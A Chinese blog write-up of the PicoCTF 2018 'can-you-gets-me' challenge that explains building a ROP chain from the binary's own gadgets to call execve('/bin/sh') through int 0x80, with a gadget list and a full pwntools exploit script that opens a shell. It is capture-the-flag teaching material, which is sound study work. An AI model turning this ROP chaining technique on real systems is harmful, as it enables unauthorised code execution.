非常规情况下栈溢出系统调用——PicoCTF_2018_can-you-gets-me

最新推荐文章于 2024-09-30 23:35:28 发布
最新推荐文章于 2024-09-30 23:35:28 发布
阅读量565 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 栈溢出 ROP 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43986365/article/details/107783670
本文介绍了一种在NX保护下利用程序中的Gadget进行ROP攻击的方法,通过构造特定的exp,成功实现了execve系统调用来获取shell。文章详细解释了如何在不可执行堆栈上放置/bin/sh字符串,并利用gadget进行系统调用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言:

对于这种非常规的栈溢出题目,我自己也是见的比较少,故写此博客记录一下。

解题思路

查看保护

在这里插入图片描述
只开了NX保护的32位程序,如果是常规题的话,应该是非常容易做的。

进入IDA查看伪代码

打开IDA,如果是第一次见这种题目就会傻眼了。
在这里插入图片描述
题目中的每一个函数都好像是自己写的,那么我们就不能利用got表来泄露函数地址来getshell了。
题目开了NX保护,我们不能写shellcode,常规的ROP又利用不了,我们就完全利用不了libc里边的函数了。
乍一看,好像没什么办法了,但是我们可以用程序中非常多的gadget来调用系统调用。

目标:execve(0xb, “/bin/sh”, 0, 0);

既然是系统调用,我们就很容易想到execve来getshell,而程序中也正好有这些gadgets,包括最重要的int 0x80。
而execve的结构是:

eax = 0x0b
ebx = address of "/bin/sh"
ecx = 0
edx = 0

我们就用ROPgadget来找到我们想要的gadget。

0x080b81c6 : pop eax ; ret
0x0806f02a : pop edx ; ret
0x0806f051 : pop ecx ; pop ebx ; ret
0x080549db : mov [edx], eax;ret
0x08049303 : xor eax, eax ; ret
0x0808f097 : add eax, 2 ; ret
0x0808f0b0 : add eax, 3 ; ret
0x0806cc25 : int 0x80
0x080481b2 : ret

而且我们还需要把/bin/sh放到一个地方,放在哪里合适呢?

0x08048000 0x080e9000 r-xp	/mnt/hgfs/share/buuctf/PicoCTF_2018_can-you-gets-me/PicoCTF_2018_can-you-gets-me
0x080e9000 0x080eb000 rw-p	/mnt/hgfs/share/buuctf/PicoCTF_2018_can-you-gets-me/PicoCTF_2018_can-you-gets-me   #毫无疑问,放在这里可写的地方最合适
0x080eb000 0x0810e000 rw-p	[heap]
0xf7ffa000 0xf7ffd000 r--p	[vvar]
0xf7ffd000 0xf7ffe000 r-xp	[vdso]
0xfffdd000 0xffffe000 rw-p	[stack]

我们就放在0x080e9000到0x080eb000之间就行
然后我们用我们找到的gadgets来构造exp就可以了。

完整exp:

#! /usr/bin/env python
from pwn import *

p = process('./PicoCTF_2018_can-you-gets-me')
#p = remote('node3.buuoj.cn', 28541)

writeable_memory = 0x080e9040
binsh = 0x80e9040
int80 = 0x0806cc25
ret = 0x080481b2

pop_eax = 0x080b81c6
pop_edx = 0x0806f02a
pop_ecx_ebx = 0x0806f051
mov_eax_to_edx = 0x080549db

set_eax_zero = 0x08049303
add_eax_two = 0x0808f097
add_eax_three = 0x0808f0b0

payload = ""
payload += "A"*28

payload += p32(pop_edx)
payload += p32(writeable_memory)

payload += p32(pop_eax)
payload += "/bin"

payload += p32(mov_eax_to_edx)

writeable_memory += 4

payload += p32(pop_edx)
payload += p32(writeable_memory)

payload += p32(pop_eax)
payload += "/sh\x00"

payload += p32(mov_eax_to_edx)

writeable_memory += 3

payload += p32(set_eax_zero)
payload += p32(pop_edx)

payload += p32(writeable_memory)    #   让字符串以空结尾
payload += p32(mov_eax_to_edx)

payload += p32(pop_ecx_ebx)
payload += p32(0)
payload += p32(binsh)

payload += p32(pop_edx)
payload += p32(0)

payload += p32(set_eax_zero)
payload += p32(add_eax_three)
payload += p32(add_eax_three)
payload += p32(add_eax_three)
payload += p32(add_eax_two)     # eax = 0x0b

payload += p32(int80)
payload += p32(ret)

p.recvuntil("GIVE ME YOUR NAME!")
p.send(payload)
p.interactive()
【OpenHarmony4.1 之 U-Boot 2024.07源码深度解析】006 - Makefile 编译脚本 逐行深度解析
|~~~热爱生活、努力学习的小伙汁~~~|
06-15 1126
【OpenHarmony4.1 之 U-Boot 2024.07源码深度解析】006 - Makefile 编译脚本 逐行深度解析
2021-09-20 BUUCTF WriteUP(堆/字符串/栈)
m0_56897090的博客
09-20 745
文章目录堆类综合模型总结pwnable_hacknote分析EXPhitcontraining_bamboobox分析EXPnpuctf_2020_easyheap分析EXPciscn_2019_es_1分析EXPhitcontraining_unlink分析EXPgyctf_2020_some_thing_exceting分析EXP栈溢出综合模型总结picoctf_2018_shellcode分析EXPjarvisoj_level5分析EXPcmcc_pwnme2分析EXPactf_2019_babyst
[buuctf]PicoCTF_2018_shellcode
逆向萌新的博客
07-17 511
[buuctf]PicoCTF_2018_shellcode,这道题主要是考你的shellcode编写能力和使用能力,或者是利用pwntools自动生成的shellcode进行利用
[BUUCTF]PWN——picoctf_2018_can_you_gets_me
mcmuyanga的博客
01-21 809
picoctf_2018_can_you_gets_me 附件 步骤: 例行检查,32位,开启了nx 本地试运行一下,看看大概的情况 32位ida载入 一开始一看发现是简单的栈溢出,直接就准备用ret2libc的方法了,但是在我找plt表找put@plt的时候我傻了,没有,双击一下puts,发现找个puts是出题人自己写的函数 想起来了之前做到的一道题目inndy_rop,那题也是没法利用got表,所以利用了工具ROPgadget,它有一个功能,可以直接利用程序中的片段拼凑rop链,这边也尝试一下
[BUUCTF-pwn]——picoctf_2018_can_you_gets_me
Y_peak的博客
02-24 468
[BUUCTF-pwn]——picoctf_2018_can_you_gets_me 题目地址:https://buuoj.cn/challenges#picoctf_2018_can_you_gets_me 通过这道题又学到了一个知识点。ROPgadget构造rop链 还是先checksec一下 在IDA中,查看一下。有gets栈溢出,又有puts函数。想当然的我们想到,通过puts函数,leek出一个got表地址,找到libc的栈基址,进而找到system函数和’/bin/sh’ 尝试过后你会
picoctf_2018_can_you_gets_me
qq_62887641的博客
10-01 238
32位,只开了NX拿到这么大的程序,直接ROPchain看看果不其然然后去ida看看溢出点秒了。
PicoCTF_2018_are_you_root(未初始化验证漏洞)
seaaseesa的博客
04-17 926
PicoCTF_2018_are_you_root 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,只要符合条件就可以显示flag,但是按照正常的逻辑是不能的。 Login时,会malloc一个堆,大小为0x10,并且偏移8处就是auth的验证码。但是login时,并没有初始化*(v7+8)处的值,使得它的值是前面的操作影响。而strdup函数,内部会malloc一个与字符...
写在Linux栈溢出尝试的黎明前
singshinesong的博客
04-18 177
当然,希望还是要有的,总有那一小撮人,不愿随波逐流,不辞昼夜地做一些“无所谓”的试验,如与哪位过客有缘,愿意指点一二,仍旧十分感激!姑且当做一次小试牛刀吧,虽中途折戟,铩羽而归,但验证了一些什么,毫不后悔,“我来了,我看见,我没有征服”O(∩_∩)O哈哈~,只得总结下经验教训供大家借鉴吧。被攻击程序一般接受用户输入,理论上不接受输入的程序无法与用户交互,这种“一刀切”后果是用户只能使用它展示的内容,无法与其交互,体验效果不佳,当然相当安全了。就这还没有调试实现成功利用呢。”,提示找不到路径,“?
csapp-深入理解计算机系统学习记录
热门推荐
mackilo的博客
02-16 1万+
文章目录csapp 学习记录一第1章:计算机系统漫游信息就是位+上下文从一个c文件,到可执行目标文件整个翻译过程分为4个阶段程序执行的过程:摩尔定律:HELLO WORLD 可执行程序的产生理解编译过程及原理的意义何在可执行程序hello在计算机上执行的过程程序执行过程中的几点启示系统的硬件组成高速缓存存储设备形成层次结构操作系统管理硬件进程线程虚拟内存并发和并行线程级并发指令级并行第2章:信息表示和处理2.1 信息存储2.1.1 十六进制表示法2.1.2 字2.1.3 数据大小2.1.4 寻址和字节顺序2
Linux进程管理(二)进程描述符task_struct
最新发布
weixin_44555799的博客
09-30 965
本文linux内核版本5.10.226(只要是linux5.10.x就行,基本不会有大的出入),结构体struct task_struct定义在 include/linux/sched.h,长达732行,可见描述一个任务的复杂度之大。
picoctf_2018_leak_me
weixin_51298357的博客
01-30 501
picoctf_2018_leak_me 反编译修复+满足条件后leak 0x01 ​ 这道题一开始F5不能显示伪代码。会显示又有个地方有问题,快捷键g输入有问题的地方的地址,然后点进去先反编译有问题的这个函数,然后再出来反编译整个函数就好了 0x02 查看程序里的函数 大体看一下程序,执行流:程序执行puts输出name → 输入password→password正确时得到flag main函数中fgets函数的地方存在漏洞 # -*- coding: utf-8 -*- from pwn
BUUCTF(pwn) picoctf_2018_leak_me
半岛铁盒的博客
04-06 399
这题难度不大,分析好流程就可以; name,与密码 是紧挨着的,相差0x100,即256 我们可以利用puts() 进行溢出泄漏密码; 因为 puts() 函数输出遇到\x00停止; from pwn import * p = remote(“node3.buuoj.cn”,27388) p.sendline(‘a’) p.recv() p.sendline(‘a_reAllY_s3cuRe_p4s$word_f85406’) p.interactive() ...
[BUUCTF]PWN——picoctf_2018_leak_me(puts的‘\x00’绕过输出敏感数据)
mcmuyanga的博客
02-02 489
picoctf_2018_leak_me 附件 步骤 例行检查,32位,开启了nx保护 本地运行看一下大概的情况 32位ida载入 程序执行的大概流程就是先输入name,然后输入password,靶机上应该会有一个password.txt去检测是否输入是否正确,输入正确,就会调用flag函数,flag函数回将flag打印出来 参数v5(存放name)和参数s(存放flag)在栈上的位置相差不远,而且给参数v5读入数据的时候可以覆盖道参数s 他们相差0x154-0x54=0x100,而且我们对v
[BUUCTF-pwn]——picoctf_2018_leak_me(内涵peak小知识)
Y_peak的博客
03-29 436
[BUUCTF-pwn]——picoctf_2018_leak_me 题目没什么难度,但是可能反汇编的时候你们可能会出现一些问题。 peak小知识 pwn题,有时会碰到无法反汇编的情况,大多数情况下,都是call的位置报错,双击函数,按F5人为给它反汇编,再返回就可以了。不过有时候,是IDA栈指针的问题,大多数还是前者居多。 思路 在IDA中,v6代表name s是password.距离0x100也就是256。 输入256个字符后,我们可以直接将password泄露出来。这样我们就可以在下面调用flag函
picoctf_2018_shellcode
z1r0的博客
12-29 1070
picoctf_2018_shellcode 查看保护 主函数不可以直接反汇编,错在call eax这里,eax拿的是ebp+var_A0这里对应的地址。发现在call vuln上面也将eax给赋了ebp+var_A0这里的地址。进vuln看一下 可以看到vuln函数中call了gets,可以写入ebp+arg_0这里的地址。而ebp+arg_0对应是地址则是main函数中ebp+var_A0中的地址。最后会call这个地址。所以写入shellcode,最后程序会自动call这里的shellcode。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值